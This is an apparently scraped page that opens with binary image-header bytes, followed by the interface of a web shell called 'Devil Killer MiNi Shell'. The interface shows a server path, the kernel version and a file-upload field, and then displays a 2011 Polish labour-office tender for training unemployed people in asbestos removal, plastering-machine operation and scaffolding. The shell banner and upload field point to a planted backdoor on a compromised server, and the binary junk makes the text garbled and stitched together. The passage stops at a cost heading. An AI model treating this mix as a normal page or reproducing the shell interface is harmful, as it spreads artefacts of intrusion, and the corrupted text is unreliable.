JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/139018-N-2011.html

<p class="kh_header"><b>Świecie: PRZEPROWADZENIE SZKOLEŃ WG CZĘŚCI</b><br>
<b>Numer ogłoszenia: 139018 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Świecki - Powiatowy Urząd Pracy w Świeciu , ul. Wojska Polskiego 195a, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 52 33 32 210, faks 52 33 32 253.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE SZKOLEŃ WG CZĘŚCI.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ: I
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych w dwóch grupach po 5 osób.
1.	Program szkolenia
a.	Nazwa szkolenia: Zabezpieczanie i usuwanie wyrobów zawierających azbest.
b.	Zakres szkolenia
Program szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki i Pracy z dnia 14 października 2005 r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz. U. z 2005 r. Nr 216, poz. 1824), Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 02 kwietnia 2004 r. w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. z 2004 r. Nr 71, poz. 649) oraz w ustawie z dnia 19 czerwca 1997 r. o zakazie stosowania wyrobów zawierających azbest (Dz. U. z 2004 r. Nr 3, poz. 20, z późn. zm.).
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 50 godzin zajęć dla każdej grupy 5 osobowej w tym: 
5,5 godzin zajęć teoretycznych,
44,5 godziny zajęć praktycznych.
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania zawierającym: zakres szkolenia oraz opis treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych (Załącznik nr 1 do SIWZ punkt II podpunkt 6).
Szkolenie ma być realizowane w dni robocze (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 17.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godz. Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godz. zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne i piśmiennicze) tj. skrypt obejmujący zagadnienia programu szkolenia oraz zeszyt A5 60 kartkowy i długopis (Załącznik nr 1 do SIWZ punkt II podpunkt 8a). Powyższe materiały szkoleniowe muszą zostać przekazane każdemu uczestnikowi szkolenia za pokwitowaniem odbioru w pierwszym dniu zajęć.
Wykonawca będzie dysponować sprzętem do usuwania i zabezpieczania wyrobów zawierających azbest oraz 10 kompletami odzieży ochronnej dla uczestników szkolenia zgodnie z załącznikiem do Rozporządzenia Ministra Gospodarki i Pracy z dnia 14 października 2005 r. (poz. 1824) (Załącznik nr 1 do SIWZ punkt II podpunkt 8b). Wykonawca będzie dysponować wyposażeniem dydaktycznym do realizacji zajęć teoretycznych szkolenia środkami audiowizualnymi lub odpowiednimi urządzeniami do wizualizacji prezentowanych zagadnień szkolenia (Załącznik nr 1 do SIWZ punkt II podpunkt 8c). Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia (osoby zdolne do wykonania zamówienia)
Wykonawca będzie dysponować wykwalifikowaną kadrą dydaktyczną wykładowcy/-ów i/lub instruktora/-ów. Każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011 (Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji szkoleń grupowych 10 osobowych o tej samej tematyce minimum 1 szkolenie grupowe przeprowadzone w 2010/2011 roku (Załącznik nr 1 do SIWZ punkt IV).
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V)
Koniecznym jest, aby po ukończeniu szkolenia uczestnicy otrzymali zaświadczenia na podstawie § 16 ust. 3 Rozporządzenia Ministra Gospodarki i Pracy z dnia 27.07.2004 roku w sprawie szkolenia w dziedzinie bezpieczeństwa i higieny pracy (Dz.U. z 2004 r. Nr 180, poz. 1860 z późn. zmian.),  zaświadczenie zgodne z § 75 ust 2 pkt 5 lit. e Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy oraz zaświadczenie zgodne z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216).
5.	Miejsce szkolenia
Preferowane Świecie (Załącznik nr 1 do SIWZ punkt VI).
6.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
a.	W przypadku gdy odległość pomiędzy miejscem zamieszkania uczestnika szkolenia, a miejscem odbywania szkolenia przekracza 60 km Wykonawca ma obowiązek zapewnić zakwaterowanie od poniedziałku do piątku włącznie oraz pełne wyżywienie tj. śniadanie, obiad, kolacja oraz jedną przerwę kawową od poniedziałku do czwartku włącznie. W piątki Wykonawca musi zapewnić uczestnikom szkolenia śniadanie oraz jedną przerwę kawową. 
W przypadku gdy nie wszyscy uczestnicy szkolenia będą korzystali z zakwaterowania i wyżywienia, faktura za szkolenie zostanie pomniejszona proporcjonalnie. O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Obiady mają składać się z  minimum dwóch dań tj. zupy i dania głównego podczas którego należy zapewnić również wodę i/lub sok.
Na przerwach kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę.
W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest on kosztem warunkowym). 
Na potrzeby niniejszego postępowania odległości będą mierzone od miejsca zamieszkania uczestnika szkolenia do miejsca odbywania zajęć teoretycznych lub praktycznych na podstawie http://mapy.google.pl/ 

b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje stypendium oraz którym przysługuje stypendium, o którym mowa w art. 41 ust. 3b ustawy (podejmujących zatrudnienie w trakcie szkolenia). Ubezpieczenie musi zostać opłacone w przypadku uczestnika szkolenia będącego osobą bezrobotną od  dnia podjęcia przez niego zatrudnienia, natomiast w przypadku uczestnika szkolenia będącego poszukującym pracy, o którym mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez niego szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje m. in. koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika szkolenia, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony i udokumentowany przez Wykonawcę. Informacja o konieczności ubezpieczenia uczestnika/ów szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
Koszt ubezpieczenia ujęty w Kosztach szkolenia kosztów jest kosztem warunkowym.
c.	Po zakończeniu szkolenia każdej 5 osobowej grupy należy wystawić oddzielną fakturę.
7.	Koszty badań lekarskich uczestników szkolenia pokrywa Zamawiający.
8.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego).

CZĘŚĆ: II
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych w dwóch grupach po 5 osób.
1.	Program szkolenia
a.	Nazwa szkolenia: Operator agregatu tynkarskiego.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263), ponadto musi być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. 
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 63 godziny zajęć dla każdej grupy 5 osobowej w tym: 
39 godzin teoretycznych,
24 godziny praktycznych.
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania zawierającym: zakres szkolenia oraz opis treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych (Załącznik nr 1 do SIWZ punkt II podpunkt 6).
Szkolenie ma być realizowane w dni robocze (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 17.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godz. Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godz. zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne i piśmiennicze) tj. skrypt obejmujący zagadnienia programu szkolenia oraz zeszyt A5 60 kartkowy i długopis (Załącznik nr 1 do SIWZ punkt II podpunkt 8a). Powyższe materiały szkoleniowe muszą zostać przekazane każdemu uczestnikowi szkolenia za pokwitowaniem odbioru w pierwszym dniu zajęć.
Wykonawca będzie dysponować sprzętem do realizacji zajęć praktycznych szkolenia minimum jednym agregatem tynkarskim (Załącznik nr 1 do SIWZ punkt II podpunkt 8b).
Wykonawca będzie dysponować wyposażeniem dydaktycznym do realizacji zajęć teoretycznych szkolenia środkami audiowizualnymi lub odpowiednimi urządzeniami do wizualizacji prezentowanych zagadnień szkolenia (Załącznik nr 1 do SIWZ punkt II podpunkt 8c). 
Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia
e.	Przewidziane sprawdziany i egzaminy
Po zakończonym szkoleniu Wykonawca musi dokonać zapłaty za pierwszy egzamin końcowy przed Komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie i pisemnie poinformować Zamawiającego o wyznaczonym terminie ww. egzaminu (Załącznik nr 1 do SIWZ punkt II podpunkt 9).
(Koszt egzaminu państwowego należy ująć w Kosztach szkolenia).             
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia (osoby zdolne do wykonania zamówienia)
Wykonawca będzie dysponować wykwalifikowaną kadrą dydaktyczną wykładowcy/-ów i/lub instruktora/-ów. Każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011 (Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji szkoleń grupowych 10 osobowych o tej samej tematyce minimum 1 szkolenie grupowe przeprowadzone w 2010/2011 roku. (Załącznik nr 1 do SIWZ punkt IV).
Wykonawca będzie dysponować na czas realizacji szkolenia pozwoleniami Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie na przeprowadzanie szkoleń w zakresie operatorów maszyn do robót ziemnych, budowlanych i drogowych.
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V).
a.	Koniecznym jest, aby uczestnicy szkolenia otrzymali zaświadczenia zgodne z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216) oraz zaświadczenia zgodne z § 75 ust 2 pkt 5 lit. e Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy.
b.	Każdy uczestnik szkolenia, który zda egzamin końcowy musi otrzymać książkę operatora (dla osób, które posiadają już książkę należy dokonać do niej wpisu nadającego odpowiednie uprawnienia) oraz świadectwo operatora agregatu tynkarskiego zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, poz. 1263). Dla osób, które posiadają już książkę operatora należy dokonać w niej wpisu nadającego odpowiednie   uprawnienia.
c.	Wykonawca jest zobowiązany po zakończeniu egzaminu państwowego i otrzymaniu uprawnień dostarczyć do wglądu Zamawiającemu oryginał książki operatora oraz pisemną informację o uczestnikach, którzy nie stawili się na egzaminie lub go nie zdali. 
9.	Miejsce szkolenia
Preferowane Świecie (Załącznik nr 1 do SIWZ punkt VI).
10.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
a.	W przypadku gdy odległość pomiędzy miejscem zamieszkania uczestnika szkolenia, a miejscem odbywania szkolenia przekracza 60 km Wykonawca ma obowiązek zapewnić zakwaterowanie od poniedziałku do piątku włącznie oraz pełne wyżywienie tj. śniadanie, obiad, kolacja oraz jedną przerwę kawową od poniedziałku do czwartku włącznie. W piątki Wykonawca musi zapewnić uczestnikom szkolenia śniadanie oraz jedną przerwę kawową. 
W przypadku gdy nie wszyscy uczestnicy szkolenia będą korzystali z zakwaterowania i wyżywienia, faktura za szkolenie zostanie pomniejszona proporcjonalnie. O ilości osób, które będą korzystały z zakwaterowania i wyżywienia Zamawiający poinformuje Wykonawcę najpóźniej w dniu podpisania umowy lub na 5 dni przed rozpoczęciem szkolenia.
Obiady mają składać się z  minimum dwóch dań tj. zupy i dania głównego podczas którego należy zapewnić również wodę i/lub sok.
Na przerwach kawowych Wykonawca musi podać kawę i/lub herbatę i/lub wodę.
W przypadku gdy zajęcia praktyczne i/lub teoretyczne odbywać się będą w innej miejscowości niż zakwaterowanie Wykonawca musi zapewnić uczestnikom szkolenia przejazdy z miejsca zakwaterowania do miejsca odbywania szkolenia i z powrotem busem lub samochodem. W przypadku gdy zajęcia praktyczne i teoretyczne odbywać się będą w innych miejscowościach Wykonawca musi również zapewnić przejazdy pomiędzy tymi miejscami. 
(Koszty zakwaterowania i/lub wyżywienia i/lub transportu należy podać w Kosztach szkolenia. Jest on kosztem warunkowym). 
Na potrzeby niniejszego postępowania odległości będą mierzone od miejsca zamieszkania uczestnika szkolenia do miejsca odbywania zajęć teoretycznych lub praktycznych na podstawie http://mapy.google.pl/ 

b.	Wykonawca jest zobowiązany do ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia, którym nie przysługuje stypendium oraz którym przysługuje stypendium, o którym mowa w art. 41 ust. 3b ustawy (podejmujących zatrudnienie w trakcie szkolenia). Ubezpieczenie musi zostać opłacone w przypadku uczestnika szkolenia będącego osobą bezrobotną od  dnia podjęcia przez niego zatrudnienia, natomiast w przypadku uczestnika szkolenia będącego poszukującym pracy, o którym mowa w art. 43 ust. 1 ustawy o  promocji zatrudnienia i instytucjach rynku pracy od dnia rozpoczęcia przez niego szkolenia.
Zapłata należności za zorganizowanie szkolenia obejmuje m. in. koszty ubezpieczenia od następstw nieszczęśliwych wypadków uczestnika szkolenia, powstałych w związku ze szkoleniem oraz w drodze do miejsca szkolenia i z powrotem, tylko w przypadku, gdy wydatek z tego tytułu został poniesiony i udokumentowany przez Wykonawcę. Informacja o konieczności ubezpieczenia uczestnika/ów szkolenia zostanie przekazana Wykonawcy przez Zamawiającego pisemnie. 
Koszt ubezpieczenia ujęty w Kosztach szkolenia kosztów jest kosztem warunkowym.
c.	Po zakończeniu szkolenia każdej 5 osobowej grupy należy wystawić oddzielną fakturę.
11.	Koszty badań lekarskich uczestników szkolenia pokrywa Zamawiający.
12.	W ostatnim dniu szkolenia Wykonawca jest zobowiązany przeprowadzić badanie ankietowe uczestnikom szkolenia służące ocenie szkolenia (wzór ankiety stanowi załącznik do umowy szkoleniowej i jest to druk Zamawiającego).

CZĘŚĆ: III
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych w dwóch grupach po 5 osób.
1.	Program szkolenia
a.	Nazwa szkolenia: Montaż rusztowań.
b.	Zakres szkolenia
Program i ilość godzin szkolenia musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263), ponadto musi być zatwierdzony przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
c.	Czas trwania i sposób organizacji szkolenia
Liczba godzin szkolenia: 80 godziny zajęć dla każdej grupy 5 osobowej w tym: 
48 godzin teoretycznych,
32 godziny praktycznych.
W założeniach programowych przyjęto dla zajęć teoretycznych i praktycznych godzinę edukacyjną wynoszącą 45 minut.
Szkolenie musi być prowadzone zgodnie z przedłożonym przez Wykonawcę Planem nauczania zawierającym: zakres szkolenia oraz opis treści szkolenia w zakresie poszczególnych  zajęć edukacyjnych (Załącznik nr 1 do SIWZ punkt II podpunkt 6).
Szkolenie ma być realizowane w dni robocze (bez sobót, niedziel i świąt), w przedziale czasowym między godziną 8.00 a 17.00. Liczba godzin szkolenia w ciągu jednego dnia nie może przekraczać 8 godz. Wskazane jest aby szkolenie obejmowało nie mniej niż 25 godz. zegarowych w tygodniu, celem intensyfikacji i przeciwdziałaniu nieuzasadnionemu wydłużaniu szkolenia. 
d.	Wyposażenie dydaktyczne (wykaz środków i materiałów dydaktycznych), które będą wykorzystane do przeprowadzenia szkolenia
Każdy uczestnik szkolenia, musi otrzymać na własność materiały szkoleniowe (dydaktyczne i piśmiennicze) tj. skrypt obejmujący zagadnienia programu szkolenia oraz zeszyt A5 60 kartkowy i długopis. (Załącznik nr 1 do SIWZ punkt II podpunkt 8a). Powyższe materiały szkoleniowe muszą zostać przekazane każdemu uczestnikowi szkolenia za pokwitowaniem odbioru w pierwszym dniu zajęć.
Wykonawca będzie dysponować sprzętem do realizacji szkolenia minimum 1 kompletem rusztowania rurowo-złączkowego oraz dowolnego rusztowania systemowego w ilości około 100 m2 każde, ze ścianą  służącą do montażu rusztowań z możliwością ich kotwienia (Załącznik nr 1 do SIWZ punkt II podpunkt 8b).
Wykonawca będzie dysponować wyposażeniem dydaktycznym do realizacji zajęć teoretycznych szkolenia środkami audiowizualnymi lub odpowiednimi urządzeniami do wizualizacji prezentowanych zagadnień szkolenia (Załącznik nr 1 do SIWZ punkt II podpunkt 8c).
Wykonawca jest zobowiązany dostosować wyposażenie dydaktyczne i pomieszczenia do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia
e.	Przewidziane sprawdziany i egzaminy
Po zakończonym szkoleniu Wykonawca musi dokonać zapłaty za pierwszy egzamin końcowy przed Komisją powołaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie i pisemnie poinformować Zamawiającego o wyznaczonym terminie ww. egzaminu (Załącznik nr 1 do SIWZ punkt II podpunkt 9).
(Koszt egzaminu państwowego należy ująć w Kosztach szkolenia).             
2.	Kwalifikacje i doświadczenie kadry dydaktycznej dostosowane do zakresu szkolenia
Wykonawca będzie dysponować wykwalifikowaną kadrą dydaktyczną wykładowcy/-ów i/lub instruktora/-ów. Każda z osób kadry dydaktycznej będzie posiadać doświadczenie w prowadzeniu co najmniej 1 szkolenia grupowego o tej samej  tematyce co przedmiot zamówienia w latach 2010-2011 (Załącznik nr 1 do SIWZ punkt III).
3.	Posiadanie wiedzy i doświadczenia przez Wykonawcę
Wykonawca będzie posiadać doświadczenie w realizacji szkoleń grupowych 10 osobowych o tej samej tematyce minimum 1 szkolenie grupowe przeprowadzone w 2010/2011 roku (Załącznik nr 1 do SIWZ punkt IV).
Wykonawca będzie dysponować na czas realizacji szkolenia pozwoleniami Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie na przeprowadzanie szkoleń w zakresie operatorów maszyn do robót ziemnych, budowlanych i drogowych.
4.	Dokumenty potwierdzające ukończenie szkolenia i uzyskanie kwalifikacji (Załącznik nr 1 do SIWZ punkt V).
a.	Koniecznym jest, aby uczestnicy szkolenia otrzymali zaświadczenia zgodne z Rozporządzeniem MEN z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31, poz. 216) oraz zaświadczenia zgodne z § 75 ust 2 pkt 5 lit. e Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy.
b.	Każdy uczestnik szkolenia, który zda egzamin końcowy musi otrzymać książkę operatora wydaną przez Instytut Mechanizacji Budownictwa i Górnictwa Skalanego oraz świadectwo zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. Nr 118, Poz. 1263). Dla osób, które posiadają już książkę operatora należy dokonać w niej wpisu nadającego odpowiednie   uprawnienia.
c.	Wykonawca jest zobowiązany po zakończeniu egzaminu państwowego i otrzymaniu uprawnień dostarczyć do wglądu Zamawiającemu oryginał książki operatora oraz pisemną informację o uczestnikach, którzy nie stawili się na egzaminie lub go nie zdali. 
13.	Miejsce szkolenia (Załącznik nr 1 do SIWZ punkt VI).
Preferowane Świecie 
14.	Koszty szkolenia (Załącznik nr 1 do SIWZ punkt VIII).
